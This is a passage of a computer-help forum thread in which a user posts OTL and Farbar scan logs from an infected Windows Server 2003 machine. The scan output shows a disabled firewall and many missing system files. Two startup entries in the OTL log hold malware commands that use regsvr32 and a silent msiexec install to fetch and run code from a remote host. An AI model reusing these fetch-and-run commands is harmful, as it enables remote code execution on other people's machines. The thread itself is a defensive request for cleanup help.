Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help Trojan 2003 server svchost and explorer.exe sending http connections


  • Please log in to reply
5 replies to this topic

#1 jtcote

jtcote

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:06:36 AM

Posted 18 May 2017 - 06:39 PM

 
 
 
OTL logfile created on: 5/18/2017 4:18:43 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     *********************
64bit-Windows Server 2003 Standard Edition Service Pack 2 (Version = 5.2.3790) - Type = NTServer
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409  | Language: ENU | Date Format: M/d/yyyy
 
3.99 Gb Total Physical Memory | 2.69 Gb Available Physical Memory | 67.47% Memory free
5.73 Gb Paging File | 4.50 Gb Available in Paging File | 78.59% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 139.73 Gb Total Space | 89.28 Gb Free Space | 63.90% Space Free | Partition Type: NTFS


Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2011/11/21 17:10:48 | 000,148,808 | ---- | M] (CA) -- C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe
PRC - [2011/11/21 16:53:02 | 000,439,624 | ---- | M] (CA) -- C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe
PRC - [2011/11/21 16:52:40 | 000,016,200 | ---- | M] (CA) -- C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\AgPkiMon.exe
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2017/03/14 11:47:02 | 001,725,408 | ---- | M] (GlavSoft LLC.) [Auto | Running] -- C:\Program Files\TightVNC\tvnserver.exe -- (tvnserver)

SRV:64bit: - [2011/11/21 16:39:12 | 001,063,240 | ---- | M] (CA) [Auto | Running] -- C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe -- (CASUniversalAgent)

SRV - [2013/02/28 18:48:58 | 000,118,520 | ---- | M] (Riverbed Technology, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WinPcap\rpcapd.exe -- (rpcapd)
SRV - [2011/11/21 17:10:48 | 000,148,808 | ---- | M] (CA) [Auto | Running] -- C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe -- (OpenFileAgent)
SRV - [2011/11/21 16:53:02 | 000,439,624 | ---- | M] (CA) [Auto | Running] -- C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe -- (CASDiscovery)
SRV - [2010/08/18 01:31:42 | 000,111,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\system32\spoolsv.exe -- (Spooler)
SRV - [2007/02/18 05:00:00 | 000,792,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\ntfrs.exe -- (NtFrs)
SRV - [2007/02/18 05:00:00 | 000,164,864 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\dfssvc.exe -- (Dfs)
SRV - [2007/02/18 05:00:00 | 000,094,720 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysWOW64\llssrv.exe -- (LicenseService)
SRV - [2007/02/18 05:00:00 | 000,077,312 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll -- (helpsvc)
SRV - [2007/02/18 05:00:00 | 000,067,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\rsopprov.exe -- (RSoPProv)
SRV - [2007/02/18 05:00:00 | 000,040,448 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysWOW64\ismserv.exe -- (IsmServ)
SRV - [2007/02/18 05:00:00 | 000,039,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWOW64\wdfmgr.exe -- (UMWdf)
SRV - [2007/02/18 05:00:00 | 000,006,656 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\WINDOWS\Temp\ntshrui.dll -- (Iprip)
 
 
========== Driver Services (SafeList) ==========
 
DRV - [2007/02/18 05:00:00 | 000,033,792 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\SysWow64\mnmdd.dll -- (mnmdd)
DRV - [2007/02/18 05:00:00 | 000,002,864 | ---- | M] (Microsoft Corporation) [Adapter | On_Demand | Unknown] -- C:\WINDOWS\SysWow64\winsock.dll -- (Winsock)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF:64bit: - HKLM\Software\MozillaPlugins\@t.garena.com/garenatalk: C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll File not found
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
 
 
Hosts file not found
O3:64bit: - HKCU\..\Toolbar\ShellBrowser: (&Address) - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - %SystemRoot%\system32\browseui.dll File not found
O3:64bit: - HKCU\..\Toolbar\WebBrowser: (&Address) - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - %SystemRoot%\system32\browseui.dll File not found
O3:64bit: - HKCU\..\Toolbar\WebBrowser: (&Links) - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - %SystemRoot%\system32\SHELL32.dll File not found
O4:64bit: - HKLM..\Run: [start] regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll File not found
O4:64bit: - HKLM..\Run: [start1] msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q File not found
O4:64bit: - HKLM..\Run: [tvncontrol] C:\Program Files\TightVNC\tvnserver.exe (GlavSoft LLC.)
O4 - Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk =  File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ShowSuperHidden = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: disablecad = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 149
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000001 [] - %SystemRoot%\System32\mswsock.dll File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000002 [] - %SystemRoot%\System32\winrnr.dll File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000003 [] - %SystemRoot%\System32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000001 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000002 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000003 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000004 - %SystemRoot%\system32\mswsock.dll File not found
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000005 - %SystemRoot%\system32\mswsock.dll File not found
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = art.local
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C3E0C66F-BDEA-43BB-85C9-E83C3F24C615}: NameServer = 10.10.10.230,10.10.10.231
O18:64bit: - Protocol\Handler\about {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\cdl {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\file {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\ftp {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\gopher {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\http {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\https {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll File not found
O18:64bit: - Protocol\Handler\javascript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\local {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\mailto {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\mhtml {05300401-BCBC-11d0-85E3-00C04FD85AB4} - %SystemRoot%\system32\inetcomm.dll File not found
O18:64bit: - Protocol\Handler\mk {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Handler\ms-its {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll File not found
O18:64bit: - Protocol\Handler\res {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\sysimage {76E67A63-06E9-11D2-A840-006008059382} - %SystemRoot%\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll File not found
O18:64bit: - Protocol\Handler\wia {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll File not found
O18:64bit: - Protocol\Filter\Class Install Handler {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\deflate {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\gzip {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\lzdhtml {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll File not found
O18:64bit: - Protocol\Filter\text/webviewhtml {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - %SystemRoot%\system32\SHELL32.dll File not found
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) -  File not found
O20:64bit: - HKLM Winlogon: UIHost - (%SystemRoot%\system32\logonui.exe) -  File not found
O20:64bit: - HKLM Winlogon: VMApplet - (Control_RunDLL "sysdm.cpl") -  File not found
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: System - (lsass.exe) -  File not found
O20 - HKLM Winlogon: UserInit - (userinit) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\crypt32chain: DllName - (crypt32.dll) -  File not found
O20:64bit: - Winlogon\Notify\cryptnet: DllName - (cryptnet.dll) -  File not found
O20:64bit: - Winlogon\Notify\cscdll: DllName - (cscdll.dll) -  File not found
O20:64bit: - Winlogon\Notify\dimsntfy: DllName - (dimsntfy.dll) -  File not found
O20:64bit: - Winlogon\Notify\ScCertProp: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\Schedule: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\sclgntfy: DllName - (sclgntfy.dll) -  File not found
O20:64bit: - Winlogon\Notify\SensLogn: DllName - (WlNotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\termsrv: DllName - (wlnotify.dll) -  File not found
O20:64bit: - Winlogon\Notify\wlballoon: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\ScCertProp: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\Schedule: DllName - (wlnotify.dll) -  File not found
O20 - Winlogon\Notify\SensLogn: DllName - (WlNotify.dll) -  File not found
O20 - Winlogon\Notify\wlballoon: DllName - (wlnotify.dll) -  File not found
O21:64bit: - SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll File not found
O21:64bit: - SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll File not found
O21:64bit: - SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll File not found
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINDOWS\system32\webcheck.dll File not found
O22:64bit: - SharedTaskScheduler: {438755C2-A8BA-11D1-B96B-00A0C90312E1} - Browseui preloader - %SystemRoot%\system32\browseui.dll File not found
O22:64bit: - SharedTaskScheduler: {8C7461EF-2B13-11d2-BE35-3078302C2030} - Component Categories cache daemon - %SystemRoot%\system32\browseui.dll File not found
O28:64bit: - HKLM ShellExecuteHooks: {AEB6717E-7E19-11d0-97EE-00C04FD91972} - shell32.dll File not found
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/11/13 15:06:19 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========

[2017/05/10 19:46:33 | 000,000,000 | ---D | C] -- C:\WINDOWS\Minidump
[2017/05/02 23:34:10 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Updates
[2017/05/02 23:34:09 | 000,139,264 | ---- | C] (Microsoft) -- C:\WINDOWS\UpdateInstaller.exe
[5 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2017/05/18 16:22:28 | 000,038,742 | ---- | M] () -- C:\WINDOWS\ZAM.krnl.trace
[2017/05/18 16:22:28 | 000,029,945 | ---- | M] () -- C:\WINDOWS\ZAM_Guard.krnl.trace
[2017/05/18 16:13:02 | 000,001,144 | RHS- | M] () -- C:\Documents and Settings\All Users\ntuser.pol
[2017/05/18 16:12:48 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2017/05/15 20:45:40 | 000,000,638 | ---- | M] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to mbar.lnk
[2017/05/15 20:05:19 | 000,000,678 | ---- | M] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
[2017/05/15 15:22:55 | 000,000,664 | ---- | M] () -- C:\WINDOWS\SysWow64\d3d9caps.dat
[2017/05/15 14:20:20 | 000,001,061 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\VMware vCenter Converter Standalone Client.lnk
[2017/05/15 14:20:18 | 000,001,024 | ---- | M] () -- C:\.rnd
[2017/05/12 16:36:36 | 000,000,085 | ---- | M] () -- C:\WINDOWS\wininit.ini
[2017/05/10 19:46:31 | 934,907,904 | ---- | M] () -- C:\WINDOWS\MEMORY.DMP
[2017/05/02 23:34:09 | 000,139,264 | ---- | M] (Microsoft) -- C:\WINDOWS\UpdateInstaller.exe
[5 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
 
========== Files Created - No Company Name ==========

[2017/05/15 20:05:19 | 000,000,678 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
[2017/05/15 15:21:09 | 000,038,508 | ---- | C] () -- C:\WINDOWS\ZAM.krnl.trace
[2017/05/15 15:21:01 | 000,029,699 | ---- | C] () -- C:\WINDOWS\ZAM_Guard.krnl.trace
[2017/05/15 14:20:19 | 000,001,061 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\VMware vCenter Converter Standalone Client.lnk
[2017/05/15 10:54:00 | 000,001,592 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Desktop\Event Viewer.lnk
[2017/05/12 16:36:31 | 000,000,085 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2017/02/17 18:14:13 | 000,000,000 | ---- | C] () -- C:\WINDOWS\admin.INI
[2015/12/05 03:24:23 | 000,157,696 | ---- | C] () -- C:\WINDOWS\ERUNT.exe
[2015/05/13 17:27:23 | 000,000,440 | RHS- | C] () -- C:\Documents and Settings\Administrator.ART\ntuser.pol
[2015/05/07 15:26:33 | 000,000,218 | ---- | C] () -- C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\recently-used.xbel
[2013/11/14 10:01:10 | 000,001,144 | RHS- | C] () -- C:\Documents and Settings\All Users\ntuser.pol
 
========== ZeroAccess Check ==========
 
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = %SystemRoot%\system32\shdocvw.dll
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\SysWOW64\shdocvw.dll -- [2015/04/08 22:46:40 | 001,520,128 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\WINDOWS\system32\wbem\fastprox.dll
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\SysWOW64\wbem\fastprox.dll -- [2009/03/19 19:51:22 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\WINDOWS\system32\wbem\wbemess.dll
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
< End of report >


BC AdBot (Login to Remove)

 


#2 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:06:36 AM

Posted 18 May 2017 - 07:21 PM

FSS scan output:

 

Farbar Service Scanner Version: 27-01-2016
Ran by Administrator (administrator) on 18-05-2017 at 17:19:08
Running from "C:\Documents and Settings\Administrator.ART\My Documents\Downloads"
Microsoft® Windows® Server 2003 Standard x64 Edition Service Pack 2 (X64)
Boot Mode: Normal
****************************************************************
Internet Services:
============
Nsi Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open Nsi registry key. The service key does not exist.
nsiproxy Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open nsiproxy registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open nsiproxy registry key. The service key does not exist.
Checking LEGACY_nsiproxy: ATTENTION!=====> Unable to open LEGACY_nsiproxy\0000 registry key. The key does not exist.
tdx Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open tdx registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open tdx registry key. The service key does not exist.
Checking LEGACY_tdx: ATTENTION!=====> Unable to open LEGACY_tdx\0000 registry key. The key does not exist.

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
ATTENTION!=====> local policy on IP:
Key: "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local"
Value: "ActivePolicy"
Data: "SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{37dd8956-8de4-46d2-abc4-90098777d79b}"

Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open mpsdrv registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open mpsdrv registry key. The service key does not exist.
Checking LEGACY_mpsdrv: ATTENTION!=====> Unable to open LEGACY_mpsdrv\0000 registry key. The key does not exist.
MpsSvc Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open MpsSvc registry key. The service key does not exist.
bfe Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open bfe registry key. The service key does not exist.

Firewall Disabled Policy:
==================
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall"=DWORD:0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=DWORD:0

System Restore:
============
SDRSVC Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open SDRSVC registry key. The service key does not exist.

System Restore Policy:
========================

Security Center:
============
wscsvc Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.

Windows Update:
============
Windows Autoupdate Disabled Policy:
============================

Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
Checking Start type: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.
Checking ImagePath: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.
Checking ServiceDll: ATTENTION!=====> Unable to open WinDefend registry key. The service key does not exist.

Windows Defender Disabled Policy:
==========================

Other Services:
==============
Checking Start type of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking ImagePath of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking ServiceDll of iphlpsvc: ATTENTION!=====> Unable to open iphlpsvc registry key. The service key does not exist.
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Defaults\FirewallPolicy\FirewallRules" registry key. The key does not exist.
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Parameters\FirewallPolicy\FirewallRules" registry key. The key does not exist.
Checking ServiceDll of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
 
File Check:
========
ATTENTION!=====> C:\Windows\System32\nsisvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\nsiproxy.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\afd.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\tdx.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\Drivers\tcpip.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\dnsrslvr.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\dnsapi.dll FILE IS MISSING.
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
ATTENTION!=====> C:\Windows\System32\mpssvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\bfe.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\drivers\mpsdrv.sys FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\SDRSVC.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\vssvc.exe FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wscsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wbem\WMIsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\wuaueng.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\qmgr.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\es.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\cryptsvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Program Files\Windows Defender\MpSvc.dll FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\svchost.exe FILE IS MISSING.

ATTENTION!=====> C:\Windows\System32\rpcss.dll FILE IS MISSING.
 
**** End of log ****
 
 
Moved from Windows server due to OTL logs.
NickAu

Edited by NickAu, 18 May 2017 - 08:11 PM.
Mod Edit


#3 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:06:36 AM

Posted 19 May 2017 - 10:24 AM

​SOME MORE DIAGNOSTICS :

 

- Web Browsers are unable to reach most of the sites except yahoo and sometimes google.com.

